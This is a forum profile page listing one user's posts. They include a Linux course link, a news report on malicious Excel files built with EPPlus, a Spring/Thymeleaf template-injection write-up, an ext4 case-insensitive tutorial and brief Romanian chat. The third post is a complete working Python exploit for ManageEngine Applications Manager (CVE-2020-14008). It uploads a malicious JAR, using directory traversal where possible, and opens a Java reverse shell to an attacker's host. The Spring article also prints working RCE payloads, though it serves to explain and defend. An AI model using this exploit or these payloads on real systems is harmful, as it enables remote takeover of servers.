Jump to content

Kev

Active Members
  • Posts

    1026
  • Joined

  • Days Won

    55

Everything posted by Kev

  1. This includes all the source material for the 20 lessons of what was previously a commercial online Linux server admin course - now free for you to learn with! If you spot any typos or "dead links" simply raise a GitHub "issue" against this project. You are free to use this under the terms of the license, but copyright remains with the author. Steve Download: git clone https://github.com/snori74/linuxupskillchallenge.git Source
  2. They were still Excel documents. Just not your typical Excel files. Enough to trick some security systems, though. A newly discovered malware gang is using a clever trick to create malicious Excel files that have low detection rates and a higher chance of evading security systems. Discovered by security researchers from NVISO Labs, this malware gang — which they named Epic Manchego — has been active since June, targeting companies all over the world with phishing emails that carry a malicious Excel document. But NVISO said these weren't your standard Excel spreadsheets. The malicious Excel files were bypassing security scanners and had low detection rates. Malicious Excel files were compiled with EPPlus According to NVISO, this was because the documents weren't compiled in the standard Microsoft Office software, but with a .NET library called EPPlus. Developers typically use this library part of their applications to add "Export as Excel" or "Save as spreadsheet" functions. The library can be used to generate files in a wide variety of spreadsheet formats, and even supports Excel 2019. NVISO says the Epic Manchego gang appears to have used EPPlus to generate spreadsheet files in the Office Open XML (OOXML) format. The OOXML spreadsheet files generated by Epic Manchego lacked a section of compiled VBA code, specific to Excel documents compiled in Microsoft's proprietary Office software. Some antivirus products and email scanners specifically look for this portion of VBA code to search for possible signs of malicious Excel docs, which would explain why spreadsheets generated by the Epic Manchego gang had lower detection rates than other malicious Excel files. This blob of compiled VBA code is usually where an attacker's malicious code would be stored. However, this doesn't mean the files were clean. NVISO says that the Epic Manchego simply stored their malicious code in a custom VBA code format, which was also password-protected to prevent security systems and researchers from analyzing its content. Image: NVISO But despite using a different method to generate their malicious Excel documents, the EPPlus-based spreadsheet files still worked like any other Excel document. Active since June The malicious documents (also called maldocs) still contained a malicious macro script. If users who opened the Excel files allowed the script to execute (by clicking the "Enable editing" button), the macros would download and install malware on the victim's systems. The final payloads were classic infostealer trojans like Azorult, AgentTesla, Formbook, Matiex, and njRat, which would dump passwords from the user's browsers, emails, and FTP clients, and sent them to Epic Machengo's servers. While the decision to use EPPlus to generate their malicious Excel files might have had some benefits, in the beginning, it also ended up hurting Epic Manchego in the long run, as it allowed the NVISO team to very easily detect all their past operations by searching for odd-looking Excel documents. In the end, NVISO said it discovered more than 200 malicious Excel files linked to Epic Manchego, with the first one dating back to June 22, this year. Image: NVISO NVISO says this group appears to be experimenting with this technique, and since the first attacks, they have increased both their activity and the sophistication of their attacks, suggesting this might see broader use in the future. Nevertheless, NVISO researchers weren't totally surprised that malware groups are now using EPPlus. Indicators of compromise and a technical breakdown of the malicious EPPlus-rendered Excel files are available in NVISO Labs' Epic Manchego report. Via zdnet.com
      • 1
      • Upvote
  3. #!/usr/bin/python3 # Exploit Title: ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated) # Google Dork: None # Date: 2020-09-04 # Exploit Author: Hodorsec # Vendor Homepage: https://manageengine.co.uk # Vendor Vulnerability Description: https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html # Software Link: http://archives.manageengine.com/applications_manager/14720/ # Version: Until version 14720 # Tested on: version 12900 and version 14700 # CVE : CVE-2020-14008 # Summary: # POC for proving ability to execute malicious Java code in uploaded JAR file as an Oracle Weblogic library to connect to Weblogic servers # Exploits the newInstance() and loadClass() methods being used by the "WeblogicReference", when attempting a Credential Test for a new Monitor # When invoking the Credential Test, a call is being made to lookup a possibly existing "weblogic.jar" JAR file, using the "weblogic.jndi.Environment" class and method # Vulnerable code: # Lines 129 - 207 in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java # 129 /* */ public static MBeanServer lookupMBeanServer(String hostname, String portString, String username, String password, int version) throws Exception { # 130 /* 130 */ ClassLoader current = Thread.currentThread().getContextClassLoader(); # 131 /* */ try { # 132 /* 132 */ boolean setcredentials = false; # 133 /* 133 */ String url = "t3://" + hostname + ":" + portString; # 134 /* 134 */ JarLoader jarLoader = null; # 135 /* */ # ....<SNIP>.... # 143 /* */ } # 144 /* 144 */ else if (version == 8) # 145 /* */ { # 146 /* 146 */ if (new File("./../working/classes/weblogic/version8/weblogic.jar").exists()) # 147 /* */ { # 148 /* */ # 149 /* 149 */ jarLoader = new JarLoader("." + File.separator + ".." + File.separator + "working" + File.separator + "classes" + File.separator + "weblogic" + File.separator + "version8" + File.separator + "weblogic.jar"); # 150 /* */ # ....<SNIP>.... # 170 /* 170 */ Thread.currentThread().setContextClassLoader(jarLoader); # 171 /* 171 */ Class cls = jarLoader.loadClass("weblogic.jndi.Environment"); # 172 /* 172 */ Object env = cls.newInstance(); # Example call for MAM version 12900: # $ python3 poc_mam_weblogic_upload_and_exec_jar.py https://192.168.252.12:8443 admin admin weblogic.jar # [*] Visiting page to retrieve initial cookies... # [*] Retrieving admin cookie... # [*] Getting base directory of ManageEngine... # [*] Found base directory: C:\Program Files (x86)\ManageEngine\AppManager12 # [*] Creating JAR file... # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true # Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true # added manifest # adding: weblogic/jndi/Environment.class(in = 1844) (out= 1079)(deflated 41%) # [*] Uploading JAR file... # [*] Attempting to upload JAR directly to targeted Weblogic folder... # [*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function! # [*] Running the Weblogic credentialtest which triggers the code in the JAR... # [*] Check your shell... # Function flow: # 1. Get initial cookie # 2. Get valid session cookie by logging in # 3. Get base directory of installation # 4. Generate a malicious JAR file # 5. Attempt to directly upload JAR, if success, jump to 7 # 6. Create task with random ID to copy JAR file to expected Weblogic location # 7. Execute task # 8. Delete task for cleanup # 9. Run the vulnerable credentialTest, using the malicious JAR import requests import urllib3 import shutil import subprocess import os import sys import random import re from lxml import html # Optionally, use a proxy # proxy = "http://<user>:<pass>@<proxy>:<port>" proxy = "" os.environ['http_proxy'] = proxy os.environ['HTTP_PROXY'] = proxy os.environ['https_proxy'] = proxy os.environ['HTTPS_PROXY'] = proxy # Disable cert warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Set timeout timeout = 10 # Handle CTRL-C def keyboard_interrupt(): """Handles keyboardinterrupt exceptions""" print("\n\n[*] User requested an interrupt, exiting...") exit(0) # Custom headers def http_headers(): headers = { 'User-Agent': 'Mozilla', } return headers def get_initial_cookie(url,headers): print("[*] Visiting page to retrieve initial cookies...") target = url + "/index.do" r = requests.get(target,headers=headers,timeout=timeout,verify=False) return r.cookies def get_valid_cookie(url,headers,initial_cookies,usern,passw): print("[*] Retrieving admin cookie...") appl_cookie = "JSESSIONID_APM_9090" post_data = {'clienttype':'html', 'webstart':'', 'j_username':usern, 'ScreenWidth':'1280', 'ScreenHeight':'709', 'username':usern, 'j_password':passw, 'submit':'Login'} target = url + "/j_security_check" r = requests.post(target,data=post_data,headers=headers,cookies=initial_cookies,timeout=timeout,verify=False) res = r.text if "Server responded in " in res: return r.cookies else: print("[!] No valid response from used session, exiting!\n") exit(-1) def get_base_dir(url,headers,valid_cookie): print("[*] Getting base directory of ManageEngine...") target = url + "/common/serverinfo.do" params = {'service':'AppManager', 'reqForAdminLayout':'true'} r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) tree = html.fromstring(r.content) pathname = tree.xpath('//table[@class="lrbtborder"]/tr[6]/td[2]/@title') base_dir = pathname[0] print("[*] Found base directory: " + base_dir) return base_dir def create_jar(command,jarname,revhost,revport): print("[*] Creating JAR file...") # Variables classname = "Environment" pkgname = "weblogic.jndi" fullname = pkgname + "." + classname manifest = "MANIFEST.MF" # Directory variables curdir = os.getcwd() metainf_dir = "META-INF" maindir = "weblogic" subdir = maindir + "/jndi" builddir = curdir + "/" + subdir # Check if directory exist, else create directory try: if os.path.isdir(builddir): pass else: os.makedirs(builddir) except OSError: print("[!] Error creating local directory \"" + builddir + "\", check permissions...") exit(-1) # Creating the text file using given parameters javafile = '''package ''' + pkgname + '''; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket; import java.util.concurrent.TimeUnit; public class ''' + classname + ''' { // This method is being called by lookupMBeanServer() in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java // Uses the jarLoader.loadClass() method to load and initiate a new instance via newInstance() public void setProviderUrl(String string) throws Exception { System.out.println("Hello from setProviderUrl()"); connect(); } // Normal main() entry public static void main(String args[]) throws Exception { System.out.println("Hello from main()"); // Added delay to notice being called from main() TimeUnit.SECONDS.sleep(10); connect(); } // Where the magic happens public static void connect() throws Exception { String host = "''' + revhost + '''"; int port = ''' + str(revport) + '''; String[] cmd = {"''' + command + '''"}; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream(); while(!s.isClosed()) { while(pi.available()>0) so.write(pi.read()); while(pe.available()>0) so.write(pe.read()); while(si.available()>0) po.write(si.read()); so.flush(); po.flush(); try { p.exitValue(); break; } catch (Exception e){ } }; p.destroy(); s.close(); } }''' # Output file to desired directory os.chdir(builddir) print(javafile,file=open(classname + ".java","w")) # Go to previous directory to create JAR file os.chdir(curdir) # Create the compiled .class file cmdCompile = "javac --release 7 " + subdir + "/*.java" process = subprocess.call(cmdCompile,shell=True) # Creating Manifest file try: if os.path.isdir(metainf_dir): pass else: os.makedirs(metainf_dir) except OSError: print("[!] Error creating local directory \"" + metainf_dir + "\", check permissions...") exit(-1) print("Main-Class: " + fullname,file=open(metainf_dir + "/" + manifest,"w")) # Create JAR file cmdJar = "jar cmvf " + metainf_dir + "/" + manifest + " " + jarname + " " + subdir + "/*.class" process = subprocess.call(cmdJar,shell=True) # Cleanup directories try: shutil.rmtree(metainf_dir) shutil.rmtree(maindir) except: print("[!] Error while cleaning up directories.") return True def upload_jar(url,headers,valid_cookie,jarname,rel_path): print("[*] Uploading JAR file...") target = url + "/Upload.do" path_normal = './' path_trav = rel_path jar = {'theFile':(jarname,open(jarname, 'rb'))} print("[*] Attempting to upload JAR directly to targeted Weblogic folder...") post_data = {'uploadDir':path_trav} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) res = r_upload.text if "successfully uploaded" not in res: print("[!] Failed to upload JAR directly, continue to add and execute job to move JAR...") post_data = {'uploadDir':path_normal} jar = {'theFile':(jarname,open(jarname, 'rb'))} r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False) return "normal_path" else: print("[*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!") return "trav_path" def create_task(url,headers,valid_cookie,action_name,rel_path,work_dir): print("[*] Creating a task to move the JAR file to relative path: " + rel_path + "...") valid_resp = "Execute Program succesfully created." target = url + "/adminAction.do" post_data = {'actions':'/adminAction.do?method=showExecProgAction&haid=null', 'method':'createExecProgAction', 'id':'0', 'displayname':action_name, 'serversite':'local', 'choosehost':'-2', 'prompt':'$', 'command':'move weblogic.jar ' + rel_path, 'execProgExecDir':work_dir, 'abortafter':'10', 'cancel':'false'} r = requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text found_id = "" if action_name in res: tree = html.fromstring(r.content) actionurls = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/@onclick') actionnames = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/text()') i = 0 for name in actionnames: for url in actionurls: if action_name in name: found_id = re.search(".*actionid=(.+?)','", actionurls[i]).group(1) print("[*] Found actionname: " + action_name + " with found actionid " + found_id) break i+=1 return found_id else: print("[!] Actionname not found. Task probably wasn't created, please check. Exiting.") exit(-1) def exec_task(url,headers,valid_cookie,found_id): print("[*] Executing created task with id: " + found_id + " to copy JAR...") valid_resp = "has been successfully executed" target = url + "/common/executeScript.do" params = {'method':'testAction', 'actionID':found_id, 'haid':'null'} r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) res = r.text if valid_resp in res: print("[*] Task " + found_id + " has been executed successfully") else: print("[!] Task not executed. Check requests, exiting...") exit(-1) return def del_task(url,headers,valid_cookie,found_id): print("[*] Deleting created task as JAR has been copied...") target = url + "/adminAction.do" params = {'method':'deleteProgExecAction'} post_data = {'haid':'null', 'headercheckbox':'on', 'progcheckbox':found_id} r = requests.post(target,params=params,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False) def run_credtest(url,headers,valid_cookie): print("[*] Running the Weblogic credentialtest which triggers the code in the JAR...") target = url + "/testCredential.do" post_data = {'method':'testCredentialForConfMonitors', 'serializedData':'url=/jsp/newConfType.jsp', 'searchOptionValue':'', 'query':'', 'addtoha':'null', 'resourceid':'', 'montype':'WEBLOGIC:7001', 'isAgentEnabled':'NO', 'resourcename':'null', 'isAgentAssociated':'false', 'hideFieldsForIT360':'null', 'childNodesForWDM':'[]', 'csrfParam':'', 'type':'WEBLOGIC:7001', 'displayname':'test', 'host':'localhost', 'netmask':'255.255.255.0', 'resolveDNS':'False', 'port':'7001', 'CredentialDetails':'nocm', 'cmValue':'-1', 'version':'WLS_8_1', 'sslenabled':'False', 'username':'test', 'password':'test', 'pollinterval':'5', 'groupname':''} print("[*] Check your shell...") requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,verify=False) return # Main def main(argv): if len(sys.argv) == 6: url = sys.argv[1] usern = sys.argv[2] passw = sys.argv[3] revhost = sys.argv[4] revport = sys.argv[5] else: print("[*] Usage: " + sys.argv[0] + " <url> <username> <password> <reverse_shell_host> <reverse_shell_port>") print("[*] Example: " + sys.argv[0] + " https://192.168.252.12:8443 admin admin 192.168.252.14 6666\n") exit(0) # Do stuff try: # Set HTTP headers headers = http_headers() # Relative path to copy the malicious JAR file rel_path = "classes/weblogic/version8/" # Generate a random ID to use for the task name and task tracking random_id = str(random.randrange(0000,9999)) # Action_name used for displaying actions in overview action_name = "move_weblogic_jar" + random_id # Working dir to append to base dir base_append = "\\working\\" # Name for JAR file to use jarname = "weblogic.jar" # Command shell to use cmd = "cmd.exe" # Execute functions initial_cookies = get_initial_cookie(url,headers) valid_cookie = get_valid_cookie(url,headers,initial_cookies,usern,passw) work_dir = get_base_dir(url,headers,valid_cookie) + base_append create_jar(cmd,jarname,revhost,revport) status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path) # Check if JAR can be uploaded via Directory Traversal # If so, no need to add and exec actions; just run the credentialtest directly if status_jar == "trav_path": run_credtest(url,headers,valid_cookie) # Cannot be uploaded via Directory Traversal, add and exec actions to move JAR. Lastly, run the vulnerable credentialtest elif status_jar == "normal_path": found_id = create_task(url,headers,valid_cookie,action_name,rel_path,work_dir) exec_task(url,headers,valid_cookie,found_id) del_task(url,headers,valid_cookie,found_id) run_credtest(url,headers,valid_cookie) except requests.exceptions.Timeout: print("[!] Timeout error\n") exit(-1) except requests.exceptions.TooManyRedirects: print("[!] Too many redirects\n") exit(-1) except requests.exceptions.ConnectionError: print("[!] Not able to connect to URL\n") exit(-1) except requests.exceptions.RequestException as e: print("[!] " + e) exit(-1) except requests.exceptions.HTTPError as e: print("[!] Failed with error code - " + e.code + "\n") exit(-1) except KeyboardInterrupt: keyboard_interrupt() # If we were called as a program, go execute the main function. if __name__ == "__main__": main(sys.argv[1:]) Source
      • 1
      • Upvote
  4. In this article, we explain how dangerous an unrestricted view name manipulation in Spring Framework could be. Before doing so, let's look at the simplest Spring application that uses Thymeleaf as a templating engine: HelloController.java: @Controller public class HelloController { @GetMapping("/") public String index(Model model) { model.addAttribute("message", "happy birthday"); return "welcome"; } } Due to the use of @Controller and @GetMapping("/") annotations, this method will be called for every HTTP GET request for the root url ('/'). It does not have any parameters and returns a static string "welcome". Spring framework interprets "welcome" as a View name, and tries to find a file "resources/templates/welcome.html" located in the application resources. If it finds it, it renders the view from the template file and returns to the user. If the Thymeleaf view engine is in use (which is the most popular for Spring), the template may look like this: welcome.html: <!DOCTYPE HTML> <html lang="en" xmlns:th="http://www.thymeleaf.org"> <div th:fragment="header"> <h3>Spring Boot Web Thymeleaf Example</h3> </div> <div th:fragment="main"> <span th:text="'Hello, ' + ${message}"></span> </div> </html> Thymeleaf engine also support file layouts. For example, you can specify a fragment in the template by using <div th:fragment="main"> and then request only this fragment from the view: @GetMapping("/main") public String fragment() { return "welcome :: main"; } Thymeleaf is intelligent enough to return only the 'main' div from the welcome view, not the whole document. From a security perspective, there may be a situation when a template name or a fragment are concatenated with untrusted data. For example, with a request parameter: @GetMapping("/path") public String path(@RequestParam String lang) { return "user/" + lang + "/welcome"; //template path is tainted } @GetMapping("/fragment") public String fragment(@RequestParam String section) { return "welcome :: " + section; //fragment is tainted } The first case may contain a potential path traversal vulnerability, but a user is limited to the 'templates' folder on the server and cannot view any files outside it. The obvious exploitation approach would be to try to find a separate file upload and create a new template, but that's a different issue. Luckily for bad guys, before loading the template from the filesystem, Spring ThymeleafView class parses the template name as an expression: try { // By parsing it as a standard expression, we might profit from the expression cache fragmentExpression = (FragmentExpression) parser.parseExpression(context, "~{" + viewTemplateName + "}"); } So, the aforementioned controllers may be exploited not by path traversal, but by expression language injection: Exploit for /path (should be url-encoded) GET /path?lang=__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x HTTP/1.1 In this exploit we use the power of expression preprocessing: by surrounding the expression with __${ and }__::.x we can make sure it's executed by thymeleaf no matter what prefixes or suffixes are. To summarize, whenever untrusted data comes to a view name returned from the controller, it could lead to expression language injection and therefore to Remote Code Execution. Even more magic In the previous examples, controllers return strings, explicitly telling Spring what view name to use, but that's not always the case. As described in the documentation, for some return types such as void, java.util.Map or org.springframework.ui.Model: It means that a controller like this: @GetMapping("/doc/{document}") public void getDocument(@PathVariable String document) { log.info("Retrieving " + document); } may look absolutely innocent at first glance, it does almost nothing, but since Spring does not know what View name to use, it takes it from the request URI. Specifically, DefaultRequestToViewNameTranslator does the following: /** * Translates the request URI of the incoming {@link HttpServletRequest} * into the view name based on the configured parameters. * @see org.springframework.web.util.UrlPathHelper#getLookupPathForRequest * @see #transformPath */ @Override public String getViewName(HttpServletRequest request) { String lookupPath = this.urlPathHelper.getLookupPathForRequest(request, HandlerMapping.LOOKUP_PATH); return (this.prefix + transformPath(lookupPath) + this.suffix); } So it also become vulnerable as the user controlled data (URI) comes directly to view name and resolved as expression. Exploit for /doc (should be url-encoded) GET /doc/__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x HTTP/1.1 Safe case: ResponseBody There are also some cases when a controller returns a used-controlled value, but they are not vulnerable to view name manipulation. For example, when the controller is annotated with @ResponseBody: @GetMapping("/safe/fragment") @ResponseBody public String safeFragment(@RequestParam String section) { return "welcome :: " + section; //FP, as @ResponseBody annotation tells Spring to process the return values as body, instead of view name } In this case, Spring Framework does not interpret it as a view name, but just returns this string in HTTP Response. The same applies to @RestController on a class, as internally it inherits @ResponseBody. Safe case: A redirect @GetMapping("/safe/redirect") public String redirect(@RequestParam String url) { return "redirect:" + url; //CWE-601, as we can control the hostname in redirect } When the view name is prepended by "redirect:" the logic is also different. In this case, Spring does not use Spring ThymeleafView anymore but a RedirectView, which does not perform expression evaluation. This example still has an open redirect vulnerability, but it is certainly not as dangerous as RCE via expression evaluation. Safe case: Response is already processed @GetMapping("/safe/doc/{document}") public void getDocument(@PathVariable String document, HttpServletResponse response) { log.info("Retrieving " + document); //FP } This case is very similar to one of the previous vulnerable examples, but since the controller has HttpServletResponse in parameters, Spring considers that it's already processed the HTTP Response, so the view name resolution just does not happen. This check exists in the ServletResponseMethodArgumentResolver class. Conclusion Spring is a framework with a bit of magic, it allows developers to write less code but sometimes this magic turns black. It's important to understand situations when user controlled data goes to sensitive variables (such as view names) and prevent them accordingly. Stay safe. Test locally Java 8+ and Maven required cd spring-view-manipulation mvn spring-boot:run curl 'localhost:8090/path?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22id%22).getInputStream()).next()%7d__::.x' Credits This project was co-authored by Michael Stepankin and Giuseppe Trovato at Veracode Authors would like to thank Aleksei Tiurin from Acunetix for the excellent research on SSTI vulnerabilities in Thymeleaf Source: github.com
  5. //scuzele mele, il am la ignore pe retardat
  6. Kev

    DarkWeb

    Enjoy!
  7. Salut, se pot transfera absolut toate datele de pe un telefon pe altul identic? inclusiv pattern display (Android) *Fara service PS: m-a prins ploo si am zis ca este cald afara; P.S.2: se supraincalzeste, sub 15% autonomie nu face nazuri, dar ce este in + se modifica brightness si afiseaza ""Seamless Screen Error " Thanks for your attention. I’m looking forward to your reply.
  8. Linux 5.2 was released over one year ago and with it, a new feature was added to support optimized case-insensitive file name lookups in the Ext4 filesystem - the first of native Linux filesystems to do it. Now, one year after this quite controversial feature was made available, Collabora and others keep building on top of it to make it more and more useful for system developers and end users. Therefore, this seems like a good time as any to take a look on why this was merged, and how to put it to work. More recently, f2fs has started to support this feature as well, following the Ext4 implementation and framework, thanks to an effort led by Google. Most, if not all, of the information described here also applies to f2fs, with small changes on the commands used to configure the superblock. Why Case-insensitive in the kernel? A file name is a text string used to uniquely identify a file (in this context, "directory" is the same as a file) at a specific level of the directory hierarchy. While, from the operating system point of view, it doesn't matter what the file name is, as long as it is unique, meaningful file names are essential for the end user, since it is the main key to locate and retrieve data. In other words, a meaningful file name is what people rely upon to find their valuable documents, pictures and spreadsheets. Traditionally, Linux (and Unix) filesystems have always considered file names as an opaque byte sequence without any special meaning, requiring users to submit the exact match of the file to find it in the filesystem. But that is not how humans operate. When people write titles, "important report.ods" and "IMPORTANT REPORT.ods" usually mean the same piece of data, and you don't care how it was written when creating it. We care about the content and the semantics of the words IMPORTANT and REPORT. In English, the only situation where different spelling of a word mean the same thing is when dealing with uppercase and lowercase, but for other languages, that is not the case. Some languages have different scripts to represent the same information and it makes sense, for a user, to not care about which different writing system the file was titled originally, when retrieving the data later. Most of these linguistic differences have been solved by userspace applications in the past, but bringing this knowledge into the kernel allow us to resolve important bottlenecks for applications being ported from other operating systems, like windows Games, who cannot be simply recompiled to understand it is running on Linux and that the filesystem is now case-sensitive. In fact, making the kernel understand the process of language normalization and casefolding allow us to optimize our disk storage, such that the system can quickly retrieve the information requested. The end result is clear: a much more user-friendly Linux experience for end-users and a much better platform to run beloved Windows games with Steam on Linux. Before enabling ⚠ This is very important. Before enabling it, make sure your kernel supports case-insensitive Ext4, and that the encoding version you plan to use is supported. The kernel supports case-insensitive Ext4 if it was built with CONFIG_UNICODE=y. If you are not sure, you can verify it on a booted kernel by reading the sysfs file below. If it doesn't exist, case-insensitive was not compiled into your kernel. $ cat /sys/fs/ext4/features/casefold Currently, the kernel supports UTF-8 up to version 12.1. mkfs will always choose the latest version, but attempting to run a filesystem with a more recent UTF-8 version than the kernel supports is risky, and to preserve your data, the kernel will refuse to mount such filesystem. To solve this issue, a kernel update is required or mkfs can be configured to use an older version. A patch is queued for next release for the kernel to report on sysfs the latest supported revision of unicode. Notice that the following file might not be available in your system, even if CONFIG_UNICODE exists. $ cat /sys/fs/unicode/version Enabling Case-insensitive First of all, make sure you've read the section "Before enabling". Failing to follow those instructions may render your filesystem unmountable in your current kernel. To enable the feature, it takes two steps: one is to enable the filesystem-wide casefold feature on the volume's superblock. This doesn't immediately make any directories case-insensitive, so don't worry, but it prepares the disk to support casefolded directories. It also configures what encoding will be used. The second step is to configure a specific directory to be case-insensitive. But first, let's see how to create a disk supporting case-insensitive. Creating a filesystem that supports case-insensitive When creating a filesystem, you need to set the casefold feature in mkfs: $ mkfs -t ext4 -O casefold /dev/vda After that, when mounting the filesystem, you can verify that the filesystem correctly has the feature: $ dumpe2fs -h /dev/vda | grep 'Filesystem features' dumpe2fs 1.45.6 (20-Mar-2020) Filesystem features: has_journal ext_attr resize_inode dir_index filetype extent 64bit flex_bg casefold sparse_super large_file huge_file dir_nlink extra_isize metadata_csum The feature is enabled in the filesystem in /dev/vda if the line above includes the feature 'casefold'. Alternatively, you can mount the filesystem and check dmesg for the mount line: $ mount /dev/vda /mnt $ dmesg | tail EXT4-fs (vda): Using encoding defined by superblock: utf8-12.1.0 with flags 0x0 EXT4-fs (vda): mounted filesystem with ordered data mode. Opts: (null) From the output above, vda was mounted with case-insensitive enabled and utf8-12.1.0. Strict mode Historically, any byte, other than the trailing slash ('/') and the null byte ('\0'), is a valid part of filenames. This is because Unix filesystems see filenames as a sequence of slash-separated components that are just opaque byte sequences, without any meaning assigned to them. Higher level userspace software give them meaning by seeing them as characters for rendering. When talking about case-insensitive, nevertheless, the kernel needs to inspect and understand what a character really is and what the rules are for case-folding. That is the reason we adopt an encoding in the kernel, like we did with UTF-8. But, for any encoding one may choose, the requirements of what a valid name is, is much more strict. In fact, there are several sequences that are simply invalid text in UTF-8. When a program asks the kernel to create a file with those names, the kernel needs to decide whether pretend the name is valid somehow or to throw an error to the application. The vast majority of applications don't care about case-insensitiveness, and expect a filename to just be accepted, as long as it is a valid Unix name. These applications will fail if the kernel throws an error on what they expect is a valid name, so by default, if an application tries to use an invalid name on a case-insensitive directory, the kernel will just let it happen, and treat that single file as an opaque byte sequence. This is fine, but case-insensitive will not work for that file only. There are cases, on the other hand, were we want to be strict on what is accepted by the filesystem. Having bad filenames mixed with good ones is confusing, and open space for programs to misbehave. For those users, though, ext4 has an strict mode, which causes any attempt to create or rename a file with a bad name to fail and return an error to the application. To build an Ext4 filesystem with strict mode enabled, use: $ mkfs -t ext4 -O casefold -E encoding_flags=strict /dev/vda Mounting the case insensitive filesystem If everything went fine and tune2fs returned without any errors, next time you mount this filesystem your kernel log will show something like the line below: $ mount /dev/sda1 /mnt $ dmesg | tail EXT4-fs (sda1): Using encoding defined by superblock: utf8-12.1.0 with flags 0x0 It has two important pieces of information. The first, is the encoding used which, in the example above, is UTF-8 supporting the version 12.1.0 of the Unicode specification. The second piece information is the flags argument, in this case 0x0, which modifies the behavior of the filesystem when dealing with casefolding directories. At the time of this writing, the only flag supported is the Strict mode, in which case the flag mask would be 0x1. Making specific directories case insensitive After mounting a case-insensitive enabled filesystem, it is now possible to flip the 'Casefold' inode attribute ('+F') in empty directories to make the lookup of files inside them case-insensitive: $ mkdir CI_dir $ chattr +F CI_dir With that setting enabled, the following should succeed, instead of the last command returning "No such file or directory." $ touch CI_dir/hello_world $ ls CI_dir/HELLO_WORLD The directory case-sensitiveness can be verified using lsattr. For instance, in the example below, the F letter indicates that the CI_dir directory is case-insensitive. $ lsattr . -------------------- ./CS_dir ----------------F--- ./CI_dir To revert the setting, and make CIdir case-insensitive once again, the directory must be emptied, and then, the Casefold attribute removed: $ rm CI_dir/* $ chattr -F CI_dir $ lsattr . -------------------- ./CS_dir -------------------- ./CI_dir -------------------- ./lost+found It is a bit annoying to require the directory to be empty to flip the case-insensitive flag, but that is a technical requirement at the moment and unlikely to change in the future. In fact, to make the data of a case-insensitive directory accessible in a case-sensitive manner, it would be much easier to move it to a new directory: $ mkdir CS_dir $ mv CI_dir/* CS_dir/ $ rm -r CI_dir Would have a similar effect, from a simple point of view. The Casefold flag recurses into nested directories. Therefore: $ mkdir CI_dir $ chattr +F CI_dir $ mkdir CI_dir/foo $ lsattr CI_dir ----------------F--- CI_dir/foo It is possible to mix case-insensitive and case-sensitive directories in the same tree: $ mkdir CI_dir $ chattr +F CI_dir $ mkdir CI_dir/foo $ chattr -F foo $ lsattr . ----------------F--- CI_dir $ lsattr CI_dir -------------------- CI_dir/foo Remember however, in the examples above, the order of commands matter, since a directory cannot have its Casefold attribute flipped if it is not empty. Non-English characters Currently, only UTF-8 encoding is supported, and I am not aware of plans to expand it to more encodings. While different encodings make a lot of sense for Eastern languages speakers for encoding compression reasons, I'm not aware of anyone currently working on it for Linux. With that said, the Linux implementation performs the Canonical Decomposition normalization process before comparing strings. That means that canonically equivalent characters can be correctly searched using a different normalized name. For instance, in some languages like German, the upper-case version of the letter ß (Eszett), is SS (or U+1E9E ẞ LATIN CAPITAL LETTER SHARP S). Thus, it makes sense for a German speaker to look for a file named "floß" (raft, in English), using the string "FLOSS": $ touch CI_dir/floß $ CI_dir/FLOSS There are also multiple ways to combine accented characters. Our method ensures, for instance that multiple encodings of the word café (coffee, in portuguese) can be interchangeable on a casefolded lookup. Let's see something cool. For this to work, you might want to copy-paste the command below, instead of typing it. Let's create some files: $ touch CI_dir/café CI_dir/café CS_dir/café CS_dir/café How many files where created? Can you explain it? Conclusion The case-insensitive feature as implemented in Ext4 is a non-intrusive mechanism to support this feature for those who need it, while minimizing impact to other applications. Given the per-directory nature, it is safe to enable the feature bit filesystem-wide and let applications enable it on directories as needed. It is simple to use and should yield higher performance for user space applications that previously had to emulate it in userspace. Hopefully, we will soon see this feature being enabled by default for distro kernels. Source
      • 4
      • Upvote
      • Downvote
      • Thanks
  9. https://www.proofhub.com/articles/discord-alternatives a spus Neme ca incet incet ne vom intoarce la linia de cod idea ar fi un iRC cam voice blur, etc este un open source, cand il gasesc revin cu edit ar fi ok sa nu raspunda la intrebarile de ^ in timp real
  10. ^ :))) First wrong:
  11. pune link-ul de unde il ai, altfel nu te crede nimeni Nu iti iei nimic nu te alarma PS: macar de nu cenzurai https://
  12. Kev

    Prodefence URLs

    This XML Sitemap contains 1000 URLs. Link: https://www.prodefence.org/post-sitemap3.xml
      • 2
      • Upvote
      • Thanks
  13. x iti faci reclama, pune link de Fabebook Sa te creada lumea //l-ai sters, un pop-up il fac in 3 secunde in paint /// al naibii ai sters linku-l din bar, dar ai incercuit site-ul cu pagina de scam LE: ai sters Taskbar, fake
